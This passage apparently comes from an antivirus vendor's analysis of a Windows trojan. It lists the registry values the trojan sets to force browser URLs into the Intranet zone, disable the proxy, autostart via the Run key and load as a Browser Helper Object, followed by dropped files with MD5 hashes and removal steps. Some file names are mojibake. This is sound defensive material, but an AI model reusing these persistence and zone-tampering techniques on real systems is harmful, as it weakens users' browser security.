[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}]
"ProcKey" = "RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RSDTRAY" = "%Program Files%\Rising\RSD\popwndexe.exe"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\System\CurrentControlSet\Services]
"Rising"

The process 9158.exe:3012 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process popwndexe.exe:760 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 C4 C3 E0 07 87 56 EA 2D 7C F7 5D 82 1E CE 20"

The process xianfengupdate.exe:660 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Browser]
"ieversion" = "6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\iexplore\AllowedDomains\*]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCR\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}]
"(Default)" = "AccountProtect Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DF EE 9E 4D 17 3B 00 D8 11 50 97 5C F2 DD 87 FA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\iexplore]
"Flags" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

[HKCR\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\InprocServer32]
"(Default)" = "%Documents and Settings%\All Users\Application Data\tools\bdmanager.dll"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}]
"NoExplorer" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]

The process %original file name%.exe:1736 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 C9 DF 57 1B 7B 63 FA 3B 44 DE 4B 18 5F 10 BA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Browser]
"ieversion" = "6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

MD5	File path
26c9871fe8541e68df2b412884fdd3e4	c:\Documents and Settings\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe
4efba0b5ffd3059d1d76c70b67850138	c:\Documents and Settings\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe
09006a81a579d90212ccc2bb62cfecc2	c:\Documents and Settings\All Users\Application Data\tools\bdmanager.dll
231af98afa9420da45dbeff33867e39f	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\TencentDownload\~508f0\QQPCDetector.dll
91cadaaa24017a099cce1df248e25225	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.dll
4f53e6f3881ff3e1ee1cc0dc0561410f	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\TencentDownload\~508f0\qmdr\dr.dll
959ea64598b9a3e494c00e8fa793be7e	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf4.tmp\System.dll
012a8879efa6f8dbc3c6ba58a659fefb	c:\Program Files\tools\BaiduP2PService.exe
a86a90ba120c455ac0e3655f146d5a0f	c:\Program Files\tools\P2PBase.dll
3b14cae0ea1d045bb5b196017913edb3	c:\Program Files\tools\P2PStatReport.dll
894ab861e608eacbac24280ab234368f	c:\Program Files\tools\P2SBase.dll
83bcf3ad82ce65d2bd0fdd364fe32cb5	c:\Program Files\tools\sr.exe
3abd5c47c61a71472f00bd45991a916f	c:\Program Files\tools\tools.exe
00986c841bcc897b86a2b394a1887295	c:\Program Files\xfplay\tools.exe
a5e5b2726680a87868f241264e53be5a	c:\Program Files\xfplay\xianfeng.exe
c54a6cbbc8cd6c9309cc2b3aa4eba6d4	c:\Program Files\xfplay\xianfengkunbang.exe
b2ef6010ddeca9357fae34e1fbe4ee2b	c:\Program Files\xfplay\xianfengupdate.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):
9158chat2_ktv088_63.exe:2116
sr.exe:244
9158IE.exe:3116
xianfengkunbang.exe:1324
BaiduP2PService.exe:252
BaiduP2PService.exe:472
RsMgrSvc.exe:1936
regsvr32.exe:2380
regsvr32.exe:2448
regsvr32.exe:2328
regsvr32.exe:2480
9158.exe:3012
popwndexe.exe:760
xianfengupdate.exe:660
%original file name%.exe:1736
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Start Menu\Programs\9158Ã‚Â¶ÃƒÂ ÃƒË†Ãƒâ€¹ÃƒÅ Ãƒâ€œÃƒâ€ Ã‚Âµ\ÃƒÂÃ‚Â¶Ãƒâ€ÃƒËœ 9158Ã‚Â¶ÃƒÂ ÃƒË†Ãƒâ€¹ÃƒÅ Ãƒâ€œÃƒâ€ Ã‚Âµ.lnk (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading2.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading1.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step1.bmp (22192 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9158Ã‚Â¶ÃƒÂ ÃƒË†Ãƒâ€¹ÃƒÅ Ãƒâ€œÃƒâ€ Ã‚Âµ\9158Ã‚Â¶ÃƒÂ ÃƒË†Ãƒâ€¹ÃƒÅ Ãƒâ€œÃƒâ€ Ã‚Âµ.lnk (707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\close.bmp (824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step2.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step3.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\return.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\finish.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox2.bmp (3 bytes)
%Documents and Settings%\%current user%\Desktop\9158Ã‚Â¶ÃƒÂ ÃƒË†Ãƒâ€¹ÃƒÅ Ãƒâ€œÃƒâ€ Ã‚Âµ.lnk (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc11.tmp (1012028 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\custom.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox1.bmp (3 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\install.txt (344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\nsTools.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr8.tmp (48917 bytes)
%Program Files%\tools\BaiduP2PService.exe (17848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\System.dll (11 bytes)
%Program Files%\tools\P2PStatReport.dll (12536 bytes)
%Program Files%\tools\P2SBase.dll (18424 bytes)
%Program Files%\tools\P2PBase.dll (17848 bytes)
%Program Files%\tools\sr.exe (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M9YNOH2J\xui[1].js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OZ0N258D\CA4PMRS9.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M9YNOH2J\CAURKDUJ.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OZ0N258D\icons[1].gif (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\Opendownloadernewxml[1].htm (899 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6N8PMZAJ\Downloaderconfig[1].htm (948 bytes)
%Program Files%\9158ktv\DownLoad\9158chat2_ktv088_63.exe.tmp (121120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\CA8HUBK5.htm (764 bytes)
C:\temp.icon (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6N8PMZAJ\main[1].ico (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\1[1].swf (48341 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (148 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabA.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabE.tmp (50 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabC.tmp (54 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdtp (158659 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdre (1040 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarD.tmp (2712 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdtp (117549 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\ch_dl_url.exe.bdre (2840 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\ch_dl_url.exe.bdtp (412553 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarB.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdre (892 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (50 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\bdsecushr.dat (3628 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdtp (568599 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\tasks.dat (2420 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdre (2124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarF.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\ioSpecial.ini (1796 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\modern-wizard.bmp (26 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.exe.log (367 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.dat (708 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDetector.dll (5257 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\QQPCMgr_Setup.exe (454597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\setup.xml (580 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\version (672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.dll (9775 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\qmdr\dr.dll (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.kui (1661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ui\snin.htm (527 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsmon.db1 (43 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdinfo.dll (601 bytes)
%Program Files%\Rising\RSD\RsMgrsvc.ini (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.rstray (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\moncom08.dll (443 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\moncomm.dll (1222 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\label.dat (384 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\datastorage.db (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CfgDll.dll (701 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\comx3.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCFG\rscfg.dll (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.dll (1353 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\lics936.txt (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscommx2.dll (479 bytes)
%Program Files%\Rising\RSD\XMLS\RSSetup.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsMgrSvc.exe (1855 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard.sys (1707 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCFG\RSCFG.xml (996 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD932\Jpn.lag (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\os.xml (685 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\Setup.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3w.dll (1848 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\RAVMON.xml (574 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\_rav.xml (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\comx3.dll (709 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\monbasedui.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\RAVCONFIG.xml (518 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RstoreDll.dll (953 bytes)
%Program Files%\Rising\RSD\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\selfmon.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\url.ini (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\atl90.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.mond (485 bytes)
%Program Files%\RsTest.ini (14 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\os.xml (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.exe (86 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravconfig.xml (518 bytes)
%Program Files%\Rising\RSD\updater.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudnotifier.dll (2752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\12345678.000 (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.ATL.manifest (466 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsmon.dat (45 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\dfw.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils.sys (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CompsVer.inf (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogDc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Setup.exe (8063 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsndisp.sys (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\ravbase.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.mond (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dll (3859 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogAc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudv3.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RavSetup.dll (7433 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\RAVXP.xml (404 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bacore.dll (2321 bytes)
%Program Files%\Rising\RSD\setup.dat (601 bytes)
%Program Files%\Rising\RSD\rslang.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\ravlog.xml (545 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rslang.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsndisp.sys (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\mscrt9.xml (961 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rscom.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\comx3.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\chs.lag (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\rsmondef.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\CfgDll.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\defmon.dll (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\ravxp.exe (601 bytes)
%Program Files%\Rising\RSD\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt09.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dat (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\mergexml.dll (117 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\Cloudv3.dll (4727 bytes)
%Program Files%\Rising\RSD\rsmginfo.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\rslog.dll (25 bytes)
%Program Files%\Rising\RSD\comx3.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogDc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\comx3.dll (693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.CRT.manifest (496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rslang.dll (1655 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\ravmon.xml (574 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\adefmon.mond (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\localopt.dll (2190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mond.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\url.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.xml (404 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsdll.dll.dat (601 bytes)
%Program Files%\Rising\RSD\os.xml (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg (48 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.rstray (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Custom.xml (775 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.mondcoms (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSSETUP.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rssqlite.dll (4311 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\monrule.dll (211 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\mondcoms.xml (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\lics936.txt (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\chs.lag (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\atl90.dll (1254 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\setup.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon.sys (2740 bytes)
%System%\drivers\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\localopt.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rscurl.dll (3126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudnet.dll (2054 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsBackup.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mond (207 bytes)
